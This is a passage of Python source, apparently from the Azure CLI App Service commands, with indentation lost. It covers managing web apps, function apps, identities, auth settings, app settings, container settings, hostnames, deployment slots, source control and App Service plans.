return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restore_from_deleted_app', slot, request)
def list_function_app(cmd, resource_group_name=None):
result = _list_app(cmd.cli_ctx, resource_group_name)
return [r for r in result if 'function' in r.kind]
def _list_app(cli_ctx, resource_group_name=None):
client = web_client_factory(cli_ctx)
if resource_group_name:
result = list(client.web_apps.list_by_resource_group(resource_group_name))
else:
result = list(client.web_apps.list())
for webapp in result:
_rename_server_farm_props(webapp)
return result
def _list_deleted_app(cli_ctx, resource_group_name=None, name=None, slot=None):
client = web_client_factory(cli_ctx)
locations = _get_deleted_apps_locations(cli_ctx)
result = list()
for location in locations:
result = result + list(client.deleted_web_apps.list_by_location(location))
if resource_group_name:
result = [r for r in result if r.resource_group == resource_group_name]
if name:
result = [r for r in result if r.deleted_site_name.lower() == name.lower()]
if slot:
result = [r for r in result if r.slot.lower() == slot.lower()]
return result
def assign_identity(cmd, resource_group_name, name, role='Contributor', slot=None, scope=None):
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
webapp.identity = ManagedServiceIdentity(type='SystemAssigned')
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter, role, scope)
return webapp.identity
def show_identity(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot).identity
def remove_identity(cmd, resource_group_name, name, slot=None):
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
webapp.identity = ManagedServiceIdentity(type='None')
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter)
return webapp.identity
def get_auth_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_auth_settings', slot)
def update_auth_settings(cmd, resource_group_name, name, enabled=None, action=None, # pylint: disable=unused-argument
client_id=None, token_store_enabled=None, # pylint: disable=unused-argument
token_refresh_extension_hours=None, # pylint: disable=unused-argument
allowed_external_redirect_urls=None, client_secret=None, # pylint: disable=unused-argument
allowed_audiences=None, issuer=None, facebook_app_id=None, # pylint: disable=unused-argument
facebook_app_secret=None, facebook_oauth_scopes=None, # pylint: disable=unused-argument
twitter_consumer_key=None, twitter_consumer_secret=None, # pylint: disable=unused-argument
google_client_id=None, google_client_secret=None, # pylint: disable=unused-argument
google_oauth_scopes=None, microsoft_account_client_id=None, # pylint: disable=unused-argument
microsoft_account_client_secret=None, # pylint: disable=unused-argument
microsoft_account_oauth_scopes=None, slot=None): # pylint: disable=unused-argument
auth_settings = get_auth_settings(cmd, resource_group_name, name, slot)
if action == 'AllowAnonymous':
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.allow_anonymous
elif action:
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.redirect_to_login_page
auth_settings.default_provider = AUTH_TYPES[action]
import inspect
frame = inspect.currentframe()
bool_flags = ['enabled', 'token_store_enabled']
# note: getargvalues is used already in azure.cli.core.commands.
# and no simple functional replacement for this deprecating method for 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[2:]:
if values.get(arg, None):
setattr(auth_settings, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_auth_settings', slot, auth_settings)
def list_runtimes(cmd, linux=False):
client = web_client_factory(cmd.cli_ctx)
runtime_helper = _StackRuntimeHelper(client, linux)
return [s['displayName'] for s in runtime_helper.stacks]
def _rename_server_farm_props(webapp):
# Should be renamed in SDK in a future release
setattr(webapp, 'app_service_plan_id', webapp.server_farm_id)
del webapp.server_farm_id
return webapp
def delete_function_app(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete', slot)
def delete_webapp(cmd, resource_group_name, name, keep_metrics=None, keep_empty_plan=None,
keep_dns_registration=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.delete_slot(resource_group_name, name, slot,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None,
skip_dns_registration=False if keep_dns_registration else None)
else:
client.web_apps.delete(resource_group_name, name,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None,
skip_dns_registration=False if keep_dns_registration else None)
def stop_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'stop', slot)
def start_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'start', slot)
def restart_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restart', slot)
def get_site_configs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot)
def get_app_settings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_app_setting_names = client.web_apps.list_slot_configuration_names(resource_group_name, name).app_setting_names
return _build_app_settings_output(result.properties, slot_app_setting_names)
def get_connection_strings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_constr_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.connection_string_names or []
result = [{'name': p,
'value': result.properties[p],
'slotSetting': p in slot_constr_names} for p in result.properties]
return result
def get_azure_storage_accounts(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
slot_azure_storage_config_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.azure_storage_config_names or []
return [{'name': p,
'value': result.properties[p],
'slotSetting': p in slot_azure_storage_config_names} for p in result.properties]
def _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot=None):
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
url = next(p['publishUrl'] for p in profiles if p['publishMethod'] == 'FTP')
setattr(webapp, 'ftpPublishingUrl', url)
return webapp
def _format_fx_version(custom_image_name, container_config_type=None):
fx_version = custom_image_name.strip()
fx_version_lower = fx_version.lower()
# handles case of only spaces
if fx_version:
if container_config_type:
fx_version = '{}|{}'.format(container_config_type, custom_image_name)
elif not fx_version_lower.startswith('docker|'):
fx_version = '{}|{}'.format('DOCKER', custom_image_name)
else:
fx_version = ' '
return fx_version
def _add_fx_version(cmd, resource_group_name, name, custom_image_name, slot=None):
fx_version = _format_fx_version(custom_image_name)
web_app = get_webapp(cmd, resource_group_name, name, slot)
linux_fx = fx_version if web_app.reserved else None
windows_fx = fx_version if web_app.is_xenon else None
return update_site_configs(cmd, resource_group_name, name,
linux_fx_version=linux_fx, windows_fx_version=windows_fx, slot=slot)
def _delete_linux_fx_version(cmd, resource_group_name, name, slot=None):
return update_site_configs(cmd, resource_group_name, name, linux_fx_version=' ', slot=slot)
def _get_fx_version(cmd, resource_group_name, name, slot=None):
site_config = get_site_configs(cmd, resource_group_name, name, slot)
return site_config.linux_fx_version or site_config.windows_fx_version or ''
def url_validator(url):
try:
result = urlparse(url)
return all([result.scheme, result.netloc, result.path])
except ValueError:
return False
def _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot=None):
from base64 import b64decode
linux_fx_version = _get_fx_version(cmd, resource_group_name, name, slot)
if not any([linux_fx_version.startswith(s) for s in MULTI_CONTAINER_TYPES]):
raise CLIError("Cannot decode config that is not one of the"
" following types: {}".format(','.join(MULTI_CONTAINER_TYPES)))
return b64decode(linux_fx_version.split('|')[1].encode('utf-8'))
def _get_linux_multicontainer_encoded_config_from_file(file_name):
from base64 import b64encode
config_file_bytes = None
if url_validator(file_name):
response = urlopen(file_name, context=_ssl_context())
config_file_bytes = response.read()
else:
with open(file_name, 'rb') as f:
config_file_bytes = f.read()
# Decode base64 encoded byte array into string
return b64encode(config_file_bytes).decode('utf-8')
# for any modifications to the non-optional parameters, adjust the reflection logic accordingly
# in the method
def update_site_configs(cmd, resource_group_name, name, slot=None, number_of_workers=None,
linux_fx_version=None, windows_fx_version=None, reserved_instance_count=None, php_version=None, # pylint: disable=unused-argument
python_version=None, net_framework_version=None, # pylint: disable=unused-argument
java_version=None, java_container=None, java_container_version=None, # pylint: disable=unused-argument
remote_debugging_enabled=None, web_sockets_enabled=None, # pylint: disable=unused-argument
always_on=None, auto_heal_enabled=None, # pylint: disable=unused-argument
use32_bit_worker_process=None, # pylint: disable=unused-argument
min_tls_version=None, # pylint: disable=unused-argument
http20_enabled=None, # pylint: disable=unused-argument
app_command_line=None, # pylint: disable=unused-argument
ftps_state=None, # pylint: disable=unused-argument
generic_configurations=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers', number_of_workers, min_val=0, max_val=20)
if linux_fx_version:
if linux_fx_version.strip().lower().startswith('docker|'):
update_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE=false"])
else:
delete_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE"])
if reserved_instance_count is not None:
reserved_instance_count = validate_range_of_int_flag('--prewarmed-instance-count', reserved_instance_count,
min_val=0, max_val=20)
import inspect
frame = inspect.currentframe()
bool_flags = ['remote_debugging_enabled', 'web_sockets_enabled', 'always_on',
'auto_heal_enabled', 'use32_bit_worker_process', 'http20_enabled']
int_flags = ['reserved_instance_count', 'number_of_workers']
# note: getargvalues is used already in azure.cli.core.commands.
# and no simple functional replacement for this deprecating method for 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[3:]:
if arg in int_flags and values[arg] is not None:
values[arg] = validate_and_convert_to_int(arg, values[arg])
if arg != 'generic_configurations' and values.get(arg, None):
setattr(configs, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
generic_configurations = generic_configurations or []
result = {}
for s in generic_configurations:
try:
result.update(get_json_object(s))
except CLIError:
config_name, value = s.split('=', 1)
result[config_name] = value
for config_name, value in result.items():
setattr(configs, config_name, value)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
def delete_app_settings(cmd, resource_group_name, name, setting_names, slot=None):
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
app_settings.properties.pop(setting_name, None)
if slot_cfg_names.app_setting_names and setting_name in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings.properties, slot, client)
return _build_app_settings_output(result.properties, slot_cfg_names.app_setting_names)
def delete_azure_storage_accounts(cmd, resource_group_name, name, custom_id, slot=None):
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
azure_storage_accounts.properties.pop(custom_id, None)
if slot_cfg_names.azure_storage_config_names and custom_id in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.remove(custom_id)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
return result.properties
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and sys.platform.system() == 'Windows'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_app_settings_output(app_settings, slot_cfg_names):
slot_cfg_names = slot_cfg_names or []
return [{'name': p,
'value': app_settings[p],
'slotSetting': p in slot_cfg_names} for p in _mask_creds_related_appsettings(app_settings)]
def update_connection_strings(cmd, resource_group_name, name, connection_string_type,
settings=None, slot=None, slot_settings=None):
from azure.mgmt.web.models import ConnStringValueTypePair
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
for name_value in settings + slot_settings:
# split at the first '=', connection string should not have '=' in the name
conn_string_name, value = name_value.split('=', 1)
if value[0] in ["'", '"']: # strip away the quots used as separators
value = value[1:-1]
conn_strings.properties[conn_string_name] = ConnStringValueTypePair(value=value,
type=connection_string_type)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings.properties, slot, client)
if slot_settings:
new_slot_setting_names = [n.split('=', 1)[0] for n in slot_settings]
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.connection_string_names = slot_cfg_names.connection_string_names or []
slot_cfg_names.connection_string_names += new_slot_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def delete_connection_strings(cmd, resource_group_name, name, setting_names, slot=None):
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
conn_strings.properties.pop(setting_name, None)
if slot_cfg_names.connection_string_names and setting_name in slot_cfg_names.connection_string_names:
slot_cfg_names.connection_string_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings.properties, slot, client)
CONTAINER_APPSETTING_NAMES = ['DOCKER_REGISTRY_SERVER_URL', 'DOCKER_REGISTRY_SERVER_USERNAME',
'DOCKER_REGISTRY_SERVER_PASSWORD', "WEBSITES_ENABLE_APP_SERVICE_STORAGE"]
APPSETTINGS_TO_MASK = ['DOCKER_REGISTRY_SERVER_PASSWORD']
def update_container_settings(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
websites_enable_app_service_storage=None, docker_registry_server_password=None,
multicontainer_config_type=None, multicontainer_config_file=None, slot=None):
settings = []
if docker_registry_server_url is not None:
settings.append('DOCKER_REGISTRY_SERVER_URL=' + docker_registry_server_url)
if (not docker_registry_server_user and not docker_registry_server_password and
docker_registry_server_url and '.azurecr.io' in docker_registry_server_url):
logger.warning('No credential was provided to access Azure Container Registry. Trying to look up...')
parsed = urlparse(docker_registry_server_url)
registry_name = (parsed.netloc if parsed.scheme else parsed.path).split('.')[0]
try:
docker_registry_server_user, docker_registry_server_password = _get_acr_cred(cmd.cli_ctx, registry_name)
except Exception as ex: # pylint: disable=broad-except
logger.warning("Retrieving credentials failed with an exception:'%s'", ex) # consider throw if needed
if docker_registry_server_user is not None:
settings.append('DOCKER_REGISTRY_SERVER_USERNAME=' + docker_registry_server_user)
if docker_registry_server_password is not None:
settings.append('DOCKER_REGISTRY_SERVER_PASSWORD=' + docker_registry_server_password)
if docker_custom_image_name is not None:
_add_fx_version(cmd, resource_group_name, name, docker_custom_image_name, slot)
if websites_enable_app_service_storage:
settings.append('WEBSITES_ENABLE_APP_SERVICE_STORAGE=' + websites_enable_app_service_storage)
if docker_registry_server_user or docker_registry_server_password or docker_registry_server_url or websites_enable_app_service_storage: # pylint: disable=line-too-long
update_app_settings(cmd, resource_group_name, name, settings, slot)
settings = get_app_settings(cmd, resource_group_name, name, slot)
if multicontainer_config_file and multicontainer_config_type:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
update_site_configs(cmd, resource_group_name, name, linux_fx_version=linux_fx_version, slot=slot)
elif multicontainer_config_file or multicontainer_config_type:
logger.warning('Must change both settings --multicontainer-config-file FILE --multicontainer-config-type TYPE')
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
slot=slot))
def update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
docker_registry_server_password=None, slot=None):
return update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
docker_custom_image_name, docker_registry_server_user, None,
docker_registry_server_password, multicontainer_config_type=None,
multicontainer_config_file=None, slot=slot)
def _get_acr_cred(cli_ctx, registry_name):
from azure.mgmt.containerregistry import ContainerRegistryManagementClient
from azure.cli.core.commands.parameters import get_resources_in_subscription
client = get_mgmt_service_client(cli_ctx, ContainerRegistryManagementClient).registries
result = get_resources_in_subscription(cli_ctx, 'Microsoft.ContainerRegistry/registries')
result = [item for item in result if item.name.lower() == registry_name]
if not result or len(result) > 1:
raise CLIError("No resource or more than one were found with name '{}'.".format(registry_name))
resource_group_name = parse_resource_id(result[0].id)['resource_group']
registry = client.get(resource_group_name, registry_name)
if registry.admin_user_enabled: # pylint: disable=no-member
cred = client.list_credentials(resource_group_name, registry_name)
return cred.username, cred.passwords[0].value
raise CLIError("Failed to retrieve container registry credentials. Please either provide the "
"credentials or run 'az acr update -n {} --admin-enabled true' to enable "
"admin first.".format(registry_name))
def delete_container_settings(cmd, resource_group_name, name, slot=None):
_delete_linux_fx_version(cmd, resource_group_name, name, slot)
delete_app_settings(cmd, resource_group_name, name, CONTAINER_APPSETTING_NAMES, slot)
def show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config, slot))
def show_container_settings_functionapp(cmd, resource_group_name, name, slot=None):
return show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=slot)
def _filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config=None, slot=None):
result = [x for x in settings if x['name'] in CONTAINER_APPSETTING_NAMES]
fx_version = _get_fx_version(cmd, resource_group_name, name, slot).strip()
if fx_version:
added_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME',
'value': fx_version}
result.append(added_image_name)
if show_multicontainer_config:
decoded_value = _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot)
decoded_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME_DECODED',
'value': decoded_value}
result.append(decoded_image_name)
return result
# TODO: remove this when #3660(service tracking issue) is resolved
def _mask_creds_related_appsettings(settings):
for x in [x1 for x1 in settings if x1 in APPSETTINGS_TO_MASK]:
settings[x] = None
return settings
def add_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
binding = HostNameBinding(location=webapp.location, site_name=webapp.name)
if slot is None:
return client.web_apps.create_or_update_host_name_binding(resource_group_name, webapp.name, hostname, binding)
return client.web_apps.create_or_update_host_name_binding_slot(resource_group_name, webapp.name, hostname, binding,
slot)
def delete_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return client.web_apps.delete_host_name_binding(resource_group_name, webapp_name, hostname)
return client.web_apps.delete_host_name_binding_slot(resource_group_name, webapp_name, slot, hostname)
def list_hostnames(cmd, resource_group_name, webapp_name, slot=None):
result = list(_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'list_host_name_bindings', slot))
for r in result:
r.name = r.name.split('/')[-1]
return result
def get_external_ip(cmd, resource_group_name, webapp_name):
# logics here are ported from portal
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
if webapp.hosting_environment_profile:
address = client.app_service_environments.list_vips(
resource_group_name, webapp.hosting_environment_profile.name)
if address.internal_ip_address:
ip_address = address.internal_ip_address
else:
vip = next((s for s in webapp.host_name_ssl_states if s.ssl_state == SslState.ip_based_enabled), None)
ip_address = vip.virtual_ip if vip else address.service_ip_address
else:
ip_address = _resolve_hostname_through_dns(webapp.default_host_name)
return {'ip': ip_address}
def _resolve_hostname_through_dns(hostname):
import socket
return socket.gethostbyname(hostname)
def create_webapp_slot(cmd, resource_group_name, webapp, slot, configuration_source=None):
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, webapp)
if not site:
raise CLIError("'{}' app doesn't exist".format(webapp))
if 'functionapp' in site.kind:
raise CLIError("'{}' is a function app. Please use `az functionapp deployment slot create`.".format(webapp))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
slot_def.site_config = SiteConfig()
poller = client.web_apps.create_or_update_slot(resource_group_name, webapp, slot_def, slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def create_functionapp_slot(cmd, resource_group_name, name, slot, configuration_source=None):
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' function app doesn't exist".format(name))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
poller = client.web_apps.create_or_update_slot(resource_group_name, name, slot_def, slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, name, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source=None):
clone_from_prod = configuration_source.lower() == webapp.lower()
site_config = get_site_configs(cmd, resource_group_name, webapp,
None if clone_from_prod else configuration_source)
_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_configuration', slot, site_config)
# slot create doesn't clone over the app-settings and connection-strings, so we do it here
# also make sure slot settings don't get propagated.
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, webapp)
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings',
src_slot)
for a in slot_cfg_names.app_setting_names or []:
app_settings.properties.pop(a, None)
connection_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_connection_strings',
src_slot)
for a in slot_cfg_names.connection_string_names or []:
connection_strings.properties.pop(a, None)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_application_settings',
app_settings.properties, slot, client)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_connection_strings',
connection_strings.properties, slot, client)
def config_source_control(cmd, resource_group_name, name, repo_url, repository_type='git', branch=None, # pylint: disable=too-many-locals
manual_integration=None, git_token=None, slot=None, cd_app_type=None,
app_working_dir=None, nodejs_task_runner=None, python_framework=None,
python_version=None, cd_account_create=None, cd_project_url=None, test=None,
slot_swap=None, private_repo_username=None, private_repo_password=None):
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
if cd_project_url:
# Add default values
cd_app_type = 'AspNet' if cd_app_type is None else cd_app_type
python_framework = 'Django' if python_framework is None else python_framework
python_version = 'Python 3.5.3 x86' if python_version is None else python_version
webapp_list = None if test is None else list_webapp(resource_group_name)
vsts_provider = VstsContinuousDeliveryProvider()
cd_app_type_details = {
'cd_app_type': cd_app_type,
'app_working_dir': app_working_dir,
'nodejs_task_runner': nodejs_task_runner,
'python_framework': python_framework,
'python_version': python_version
}
try:
status = vsts_provider.setup_continuous_delivery(cmd.cli_ctx, resource_group_name, name, repo_url,
branch, git_token, slot_swap, cd_app_type_details,
cd_project_url, cd_account_create, location, test,
private_repo_username, private_repo_password, webapp_list)
except RuntimeError as ex:
raise CLIError(ex)
logger.warning(status.status_message)
return status
non_vsts_params = [cd_app_type, app_working_dir, nodejs_task_runner, python_framework,
python_version, cd_account_create, test, slot_swap]
if any(non_vsts_params):
raise CLIError('Following parameters are of no use when cd_project_url is None: ' +
'cd_app_type, app_working_dir, nodejs_task_runner, python_framework,' +
'python_version, cd_account_create, test, slot_swap')
from azure.mgmt.web.models import SiteSourceControl, SourceControl
if git_token:
sc = SourceControl(location=location, source_control_name='GitHub', token=git_token)
client.update_source_control('GitHub', sc)
source_control = SiteSourceControl(location=location, repo_url=repo_url, branch=branch,
is_manual_integration=manual_integration,
is_mercurial=(repository_type != 'git'))
# SCC config can fail if previous commands caused SCMSite shutdown, so retry here.
for i in range(5):
try:
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'create_or_update_source_control',
slot, source_control)
return LongRunningOperation(cmd.cli_ctx)(poller)
except Exception as ex: # pylint: disable=broad-except
import re
ex = ex_handler_factory(no_throw=True)(ex)
# for non server errors(50x), just throw; otherwise retry 4 times
if i == 4 or not re.findall(r'\(50\d\)', str(ex)):
raise
logger.warning('retrying %s/4', i + 1)
time.sleep(5) # retry in a moment
def update_git_token(cmd, git_token=None):
'''
Update source control token cached in Azure app service. If no token is provided,
the command will clean up existing token.
'''
client = web_client_factory(cmd.cli_ctx)
from azure.mgmt.web.models import SourceControl
sc = SourceControl(name='not-really-needed', source_control_name='GitHub', token=git_token or '')
return client.update_source_control('GitHub', sc)
def show_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_source_control', slot)
def delete_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete_source_control', slot)
def enable_local_git(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
site_config = SiteConfigResource(location=location)
site_config.scm_type = 'LocalGit'
if slot is None:
client.web_apps.create_or_update_configuration(resource_group_name, name, site_config)
else:
client.web_apps.create_or_update_configuration_slot(resource_group_name, name,
site_config, slot)
return {'url': _get_local_git_url(cmd.cli_ctx, client, resource_group_name, name, slot)}
def sync_site_repo(cmd, resource_group_name, name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'sync_repository', slot)
except CloudError as ex: # Because of bad spec, sdk throws on 200. We capture it here
if ex.status_code not in [200, 204]:
raise ex
def list_app_service_plans(cmd, resource_group_name=None):
client = web_client_factory(cmd.cli_ctx)
if resource_group_name is None:
plans = list(client.app_service_plans.list(detailed=True)) # enables querying "numberOfSites"
else:
plans = list(client.app_service_plans.list_by_resource_group(resource_group_name))
for plan in plans:
# prune a few useless fields
del plan.geo_region
del plan.subscription
return plans
def create_app_service_plan(cmd, resource_group_name, name, is_linux, hyper_v, per_site_scaling=False,
app_service_environment=None, sku='B1', number_of_workers=None, location=None,
tags=None, no_wait=False):
sku = _normalize_sku(sku)
_validate_asp_sku(app_service_environment, sku)
if is_linux and hyper_v:
raise CLIError('usage error: --is-linux | --hyper-v')
client = web_client_factory(cmd.cli_ctx)
if app_service_environment:
if hyper_v:
raise CLIError('Windows containers is not yet supported in app service environment')
ase_id = _validate_app_service_environment_id(cmd.cli_ctx, app_service_environment, resource_group_name)
ase_def = HostingEnvironmentProfile(id=ase_id)
ase_list = client.app_service_environments.list()
ase_found = False
for ase in ase_list:
if ase.id.lower() == ase_id.lower():
location = ase.location
ase_found = True
break
if not ase_found:
raise CLIError("App service environment '{}' not found in subscription.".format(ase_id))
else: # Non-ASE
ase_def = None
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
# the api is odd on parameter naming, have to live with it for now
sku_def = SkuDescription(tier=get_sku_name(sku), name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), hyper_v=(hyper_v or None), name=name,
per_site_scaling=per_site_scaling, hosting_environment_profile=ase_def)
return sdk_no_wait(no_wait, client.app_service_plans.create_or_update, name=name,
resource_group_name=resource_group_name, app_service_plan=plan_def)
def update_app_service_plan(instance, sku=None, number_of_workers=None):
if number_of_workers is None and sku is None:
logger.warning('No update is done. Specify --sku and/or --number-of-workers.')
sku_def = instance.sku
if sku is not None:
sku = _normalize_sku(sku)
sku_def.tier = get_sku_name(sku)
sku_def.name = sku
if number_of_workers is not None:
sku_def.capacity = number_of_workers
instance.sku = sku_def
return instance
def update_functionapp_app_service_plan(instance, sku=None, number_of_workers=None, max_burst=None):
instance = update_app_service_plan(instance, sku, number_of_workers)
if max_burst is not None:
if not is_plan_elastic_premium(instance):
raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
instance.maximum_elastic_worker_count = max_burst
if number_of_workers is not None:
